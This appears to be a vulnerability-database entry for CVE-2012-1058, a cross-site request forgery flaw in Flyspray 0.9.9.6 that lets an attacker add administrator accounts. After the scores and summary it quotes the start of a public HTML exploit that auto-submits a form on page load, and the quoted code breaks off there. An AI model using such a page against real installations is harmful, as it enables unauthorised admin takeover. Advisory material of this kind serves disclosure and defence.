
CVE-2012-1058

Published: 14/02/2012 Updated: 29/08/2017
CVSS v2 Base Score: 6 | Impact Score: 6.4 | Exploitability Score: 6.8
VMScore: 605
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

Vulnerability Summary

Cross-site request forgery (CSRF) vulnerability in Flyspray 0.9.9.6 allows remote malicious users to hijack the authentication of admins for requests that add admin accounts via an admin.newuser action to index.php.

Vulnerable Product

flyspray flyspray 0.9.9.6

Exploits

#Exploit Title: Flyspray 0.9.9.6 CSRF Vulnerability
#Date: 06 Feb 2012
#Author: Vaibhav Gupta
#Software Link: flyspray.org/flyspray-0.9.9.6.zip
#Version: 0.9.9.6

+---+[CSRF Add Admin Account after authentication]+---+

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add ADMIN account</H2>
...